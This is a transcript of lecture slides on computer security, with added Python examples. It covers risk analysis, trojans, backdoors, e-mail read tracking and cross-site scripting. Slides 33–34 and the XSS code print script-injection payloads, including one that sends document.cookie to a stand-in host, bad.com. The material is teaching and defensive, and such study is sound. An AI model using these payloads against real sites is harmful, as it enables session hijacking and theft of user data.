Computer Security Set of slides 8 Dr Alexei Vernitski.


Transcript of Computer Security Set of slides 8 Dr Alexei Vernitski.

Page 1

Computer Security
Set of slides 8
Dr Alexei Vernitski

Page 2

Risk analysis

• Quantitative risk analysis
• Qualitative risk analysis

Read more in textbooks, for example, Pfleeger and Pfleeger, chapter “Administering Security”

Page 3

Risk analysis

• Step 1: Identify assets
– There are many types of assets (data, hardware, software, people, supplies, brand name, infrastructure ...)
• Step 2: Determine vulnerabilities
– The list of security goals may be used to suggest vulnerabilities: Confidentiality, Integrity, Availability

Page 4

Risk analysis

• Step 3: Estimate likelihood of exploitation
– Need to estimate the probability of exploitation of the vulnerability
– Can use data on frequency of attacks on specific systems
– Often an expert analyst can help with this
• Step 4: Compute the loss in case of an attack
– Some are straightforward (e.g. cost of replacing a piece of standard hardware), some may be very difficult
– If recovery is possible, include also the cost of recovery

Page 5

Risk analysis

• Step 5: Select new controls
– For each vulnerability a suitable control is selected
– For example, see the matrix of vulnerabilities and controls in Pfleeger and Pfleeger
• Step 6: Determine project savings

Page 6

Example

• The input parameters are as follows:
• Asset and cost if lost:
– Data, cost to reconstruct if lost is £10 M
• Likelihood of loss of data (exploit):
– Probability of it is 5% (from expert knowledge)
• Control and cost: encrypted data store with replicated off-site data storage, using a transaction-based approach to guarantee backup of each datum change.
– The cost of the solution is £1 M
• Effectiveness of control:
– Probability that the control is effective is 70%

Page 7

Example

• The calculation is as follows (annual data):
• Expected loss without control: 0.05 × £10 M = £0.5 M
• Expected loss with control: £0.5 M × 0.3 = £0.15 M
• Cost of control and expected loss with control in place: £0.15 M + £1.0 M = £1.15 M
• Finally the decision: the cost with the control (£1.15 M) is larger than the cost without (£0.5 M), so decide not to use the control
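The calculation on slides 6 and 7, written out as a small Python routine. This is an added illustration, not code from the slides or from Pfleeger and Pfleeger; the function names and the dictionary keys are my own. It applies the same formula to the figures on slide 8 and adds one check the slides do not show: the effectiveness a control would need before it pays for itself (the control cost divided by the expected loss it addresses; a value above 1 means no effectiveness could justify it).

```python
def expected_annual_loss(asset_value, p_loss):
    """Steps 3 and 4 combined: likelihood of the loss times the cost of the loss (per year)."""
    return asset_value * p_loss


def break_even_effectiveness(asset_value, p_loss, control_cost):
    """Minimum effectiveness at which the control's saving equals its cost.

    with_control < without  <=>  without*(1-p) + cost < without  <=>  p > cost/without
    """
    return control_cost / expected_annual_loss(asset_value, p_loss)


def evaluate_control(asset_value, p_loss, control_cost, p_effective):
    """Steps 5 and 6: compare expected annual cost with and without the control."""
    without = expected_annual_loss(asset_value, p_loss)
    residual = without * (1 - p_effective)        # loss that the control does not prevent
    with_control = residual + control_cost         # residual loss plus the price of the control
    return {
        "loss_without_control": round(without, 2),
        "residual_loss_with_control": round(residual, 2),
        "total_cost_with_control": round(with_control, 2),
        "annual_saving": round(without - with_control, 2),
        "adopt_control": with_control < without,
        "break_even_effectiveness": round(break_even_effectiveness(asset_value, p_loss, control_cost), 4),
    }


# Figures from slide 6 (pounds) and slide 8 (pounds); no other inputs are assumed.
SLIDE_6_CASE = dict(asset_value=10_000_000, p_loss=0.05, control_cost=1_000_000, p_effective=0.70)
SLIDE_8_CASE = dict(asset_value=1_000_000, p_loss=0.10, control_cost=25_000, p_effective=0.60)


def main():
    for name, case in (("slide 6/7", SLIDE_6_CASE), ("slide 8", SLIDE_8_CASE)):
        result = evaluate_control(**case)
        print(name)
        for key, value in result.items():
            print(f"  {key}: {value}")


if __name__ == "__main__":
    main()
```

For the slide 6 figures the break-even effectiveness is 2.0: the control costs twice the entire expected loss, so the decision would be the same even if the control were perfect. That is the kind of sanity check worth running before arguing about the unreliable inputs discussed on slide 10.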

Page 8

Example – for discussion

• (Pfleeger and Pfleeger, Table 8-7)
• Cost of reconstructing data, if lost: £1 M
• Likelihood of the loss of the data (per year): 10%
• Access control software is available which costs £25 K and is effective in 60% of cases
• Should we buy this software?

Page 9

Example – for discussion

• An organisation has 100 employees. Each of them uses a laptop that costs £1000. In any one year there are likely to be two employees who lose their laptops and need an urgent replacement to carry out their work. The organisation decides to buy one spare laptop (cost £1000 per year). This replacement is likely to be available and useful in 80% of the cases of a loss (i.e. it may not have specialist software installed which an employee needs immediately, or the replacement laptop may be in use by another employee).

• Carry out each of the steps of a quantitative risk analysis.
• Carry out a cost/benefit analysis (if possible) and state if the organisation should carry out the proposal.

Page 10

• Most parameters are difficult or impossible to evaluate:
– amount of loss for a given asset
– some valuable items (e.g. a human life)
– likelihood that a loss will occur
– cost of control
– effectiveness of control

• Why do we need risk analysis, even though the numbers it produces are unreliable?

Page 11

Risk analysis

• Quantitative risk analysis uses costs and probabilities

• Qualitative risk analysis uses non-numerical grades, for example
– Critical / very important / important / not important
– Very likely / likely / unlikely / very unlikely

• Which type of analysis would you recommend, the quantitative or the qualitative one?

Page 12

Other types of malware

• Viruses
• Worms
• Trojans
• Rootkits
• Trapdoors/backdoors

Page 13

Trojans

• A trojan horse is a program that appears to have some useful or benign purpose, but really masks some hidden malicious functionality

• Example: http://www.softlate.com/

Page 14

Trojans

• Unlike viruses, Trojan horses do not replicate themselves

• Unlike viruses, which are just bad tricks, Trojan horses usually attempt to do something useful for their creator

• The main use of Trojans is to collect information from your computer

• This is why they are called spyware

Page 15

Example: W32/Sdbot-MA

• Each time W32/Sdbot-MA is run it attempts to connect to a remote IRC server and join a specific channel. The worm then runs in the background allowing a remote intruder to issue commands which control the computer.

• W32/Sdbot-MA can be instructed to download and install programs on the infected computer, to flood other computers with network packets and retrieve system information including CD-keys for various games.

(the information is taken from www.sophos.com)

Page 16

Trojans’ behaviour

• Simple examples of typical behaviour of a Trojan include:

• Attempting to send e-mail messages to its creator

• Opening a TCP/IP port on your computer, to allow its creator to connect to your computer

Page 17

How Trojans collect information

• Keystroke trackers (also known as keystroke recorders) – record what the user has typed

• Fake login screens – they emulate a login to find out your password

Page 18

How Trojans collect information

• Garbage trackers – they look in the RAM or on the disk for copies of documents which may be encrypted when they are stored in files

• 85% of documents edited yesterday can be found in unused sectors of the hard drive

Page 19

Protection against Trojans

• Before your computer is infected:
– Do not download software from untrusted sources

• When your computer is infected:
– Checking logs
– Using sandboxes (what is a sandbox?)
– Using firewalls (what is a firewall?)

Page 20

Worms

• A worm is a self-replicating piece of code that spreads via networks and usually doesn’t require human interaction to propagate.

• Example: the Melissa virus from the previous lecture could also be classified as a worm

Page 21

Trapdoors/backdoors

• A backdoor is a secret entry point to a program that otherwise operates normally. It allows attackers to bypass normal security controls, gaining access on the attacker’s own terms.

• (this is the definition given with respect to one separate program)

Page 22

Backdoors (relative to one program)

Diagram: the program’s code, with two regions marked:
– Here, a password is checked
– And here, the actual code starts

Normally, execution starts at the beginning of the program. However, a hacker can start the program at some distance from the beginning, and see what happens.

Page 23

Trapdoors/backdoors

• A backdoor is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker’s own terms.

• (this is the definition given with respect to the whole computer system)

Page 24

Backdoors (relative to a computer)

Diagram: the computer’s login sequence, with two stages marked:
– First, check the user’s password
– After that, allow the user to work with the data or run programs

The normal user’s work session starts at the first stage; a hacker can start a work session bypassing the password check.

Page 25

Backdoors

• Remote execution of individual commands
• Remote command-line access
• Remote control of the GUI

Page 26

Rootkit

• A rootkit is a set of tools that modify existing operating system software so that an attacker can keep access to and hide on the machine.

• We can say that rootkits install trojans and backdoors – why?

Page 27

Code in e-mail messages

• These are simple techniques which an attacker can use; we consider them to prepare for considering the more complicated techniques of cross-site scripting

• It is possible to include executable code (e.g. JavaScript, VBA) in e-mail messages

• This can be used to collect information about the receiver of the message

• In more dangerous cases, the code can affect the work of the receiver’s computer

Page 28

Code in e-mail messages

• Example: spammers check the validity of e-mail addresses using HTML messages

• (this is referred to as ‘read tracking’; also look up ‘pixel tracking’)

• <html><body><img src="www.spam.com/script.php?id=3495"></body></html>

Page 29

How spammers check the validity of e-mail addresses

• The idea is as follows.
• The spammer generates a numbered list of e-mail addresses, for example:
1 [email protected]
[email protected]
…
3495 [email protected]

• The spammer sends a message to each address, which includes the number of this address in the list as an argument of a script

Page 30

Code in e-mail messages

• <img src="www.spam.com/script.php?id=3495">

Diagram: client on the left, server on the right.

Server side: the script script.php is executed on the server www.spam.com. This script can record that asvern checks his e-mail, therefore it is a valid e-mail address.

Client side: the client on which asvern checks his e-mail is lured into asking the server to execute script.php with an argument id=3495.
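The read-tracking pattern of slides 28 to 30, seen from the mail client's side. This is an added example, not code from the slides: a small Python scanner that lists the images an HTML message would fetch and flags the ones that match the pattern, namely a fetch from a remote host that carries a per-recipient argument (such as id=3495) or is a 1×1 image. The sample message is constructed for the example; the host names beacon.example and static.example.org are placeholders, and only www.spam.com/script.php?id=3495 comes from the slides.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed sample message (not from the slides): an inline logo attachment, the
# slide's numbered-list image, a 1x1 "open" beacon and an ordinary remote banner.
SAMPLE_EMAIL = """<html><body>
<p>Great offer inside!</p>
<img src="cid:logo.png" alt="company logo">
<img src="www.spam.com/script.php?id=3495">
<img src="https://beacon.example/open.gif?u=3495&amp;c=42" width="1" height="1">
<img src="https://static.example.org/banner.png" width="600" height="100">
</body></html>"""


class ImageCollector(HTMLParser):
    """Collects the attributes of every <img> tag in an HTML body."""

    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":  # HTMLParser lower-cases tag and attribute names
            self.images.append({name: value for name, value in attrs})


def split_src(src):
    """Split an image reference, treating a bare host such as www.spam.com/... as remote."""
    s = src.strip()
    if "://" in s or s.startswith("//"):
        return urlsplit(s)
    head = s.split("/", 1)[0]
    if "." in head and ":" not in head:  # schemeless host, as written on the slide
        return urlsplit("//" + s)
    return urlsplit(s)  # cid:, data: and relative paths have no network location


def find_tracking_images(html_text):
    """Return one record per <img>, flagging remote fetches that identify the recipient."""
    collector = ImageCollector()
    collector.feed(html_text)
    findings = []
    for attrs in collector.images:
        src = attrs.get("src")
        if not src:
            continue
        parts = split_src(src)
        remote = bool(parts.netloc)
        params = parse_qs(parts.query)
        tiny = attrs.get("width") == "1" and attrs.get("height") == "1"
        findings.append({
            "src": src,
            "host": parts.netloc,
            "remote": remote,
            "params": params,
            # A remote fetch carrying an argument (or a 1x1 image) is the read-tracking pattern
            "tracking_indicator": remote and (bool(params) or tiny),
        })
    return findings


def flagged_sources(html_text):
    """Just the image references a client should not fetch automatically."""
    return [f["src"] for f in find_tracking_images(html_text) if f["tracking_indicator"]]


if __name__ == "__main__":
    for f in find_tracking_images(SAMPLE_EMAIL):
        print(f"{f['src']!r:55} remote={f['remote']} params={f['params']} flag={f['tracking_indicator']}")
```

The scanner only recognises the pattern described on the slides; a mail client that wants to be safe does not need the heuristic at all, since simply not loading remote images until the user asks (the pre-2013 Google Mail behaviour on slide 31) stops the request that makes the address "valid".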

Page 31

For discussion

• Before December 2013 Google Mail did not show images in messages by default

• After December 2013, Google caches the images on its servers before showing them to the recipient

• What are the advantages and disadvantages of this change?

• Discussed, for example, here: https://threatpost.com/gmail-image-proxy-changes-have-privacy-security-implications/103192

Page 32

Cross-site scripting (XSS)

• XSS comes in two broad forms, which have these confusing names:
– non-permanent, or reflective
– permanent

• In both forms the attacker uses some means to send some code to a web server so that a victim accesses the page and runs the code, thinking it comes from the “trusted” web server rather than the attacker.

Page 33

XSS: snippets of code

• Good examples of insecure pages: http://www.insecurelabs.org/task

• ‘Hello world’ in JavaScript: <script>alert('hello world')</script>

• A query passed to the server and executed by the client: http://www.insecurelabs.org/task/Rule1?query=<script>alert('hello world')</script>

• Instead of this simple script, code stealing cookies would be used by an attacker

Page 34

XSS: a simplified example

• Suppose the attacker places the following comment on a message board: <SCRIPT type="text/javascript"> c = 'bad.com/process.php?cookie=' + escape(document.cookie); </SCRIPT>
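Both forms of XSS from slides 32 to 34, shown from the server's side in Python. This is an added example, not code from the slides or from insecurelabs.org: a page that reflects the query parameter (slide 33) and a message board that stores comments (slide 34) are each written twice, once copying the text into the page verbatim and once encoding it on output with html.escape from the standard library. The two payloads are the ones printed on the slides; the function and class names are my own.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Payloads taken from the slides: the reflected 'hello world' test string (slide 33)
# and the cookie-collecting comment from the message-board example (slide 34).
REFLECTED_PAYLOAD = "<script>alert('hello world')</script>"
STORED_PAYLOAD = ("<SCRIPT type=\"text/javascript\"> c = 'bad.com/process.php?cookie=' "
                  "+ escape(document.cookie); </SCRIPT>")


def query_from_url(url):
    """Extract the 'query' parameter the way a server would (.../Rule1?query=...)."""
    return parse_qs(urlsplit(url).query).get("query", [""])[0]


def render_search_vulnerable(query):
    # Reflected (non-permanent) XSS: the parameter is copied into the page verbatim,
    # so the browser parses any tags it contains as part of the "trusted" site's page.
    return f"<html><body><p>Results for: {query}</p></body></html>"


def render_search_safe(query):
    # Output encoding: < > & " ' become character references, so the browser shows
    # the text and never sees a <script> element.
    return f"<html><body><p>Results for: {html.escape(query, quote=True)}</p></body></html>"


class MessageBoard:
    """Permanent (stored) XSS: the comment is kept server-side and served to every later visitor."""

    def __init__(self):
        self.comments = []

    def post(self, text):
        self.comments.append(text)  # keep the raw text; the encoding belongs at render time

    def render_vulnerable(self):
        return "<ul>" + "".join(f"<li>{c}</li>" for c in self.comments) + "</ul>"

    def render_safe(self):
        return "<ul>" + "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in self.comments) + "</ul>"


def contains_script_element(page):
    """Crude check used here to show whether a rendered page carries a script tag."""
    return "<script" in page.lower()


if __name__ == "__main__":
    url = "http://www.insecurelabs.org/task/Rule1?query=" + REFLECTED_PAYLOAD
    q = query_from_url(url)
    print("vulnerable:", render_search_vulnerable(q))
    print("safe:      ", render_search_safe(q))
    board = MessageBoard()
    board.post(STORED_PAYLOAD)
    print("board safe:", board.render_safe())
```

html.escape is the right encoding only for text placed inside an HTML element or a quoted attribute; text placed inside a script block, a URL or a CSS value needs the encoding for that context. Independently of the encoding, a cookie set with the HttpOnly flag is not readable through document.cookie, which removes the payload on slide 34's way of collecting it even if the page does get injected.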

Page 35

Sample exam questions

• Comment on the news item: “Deniss Calovskis was named by the US as one of the creators of the Gozi virus. Security analyst Graham Cluley said Gozi was a very successful trojan that pilfered huge sums from bank accounts.”

• Comment on the news item: “The suspected hackers allegedly placed back doors, or code, to allow them to get back into the systems later to steal confidential information.”

Page 36

Sample exam questions

• Explain exactly what the word ‘cross-site’ stands for in cross-site scripting (XSS).

• Experts in computer security distinguish between permanent and non-permanent cross-site scripting. Explain exactly what the difference is between permanent and non-permanent cross-site scripting.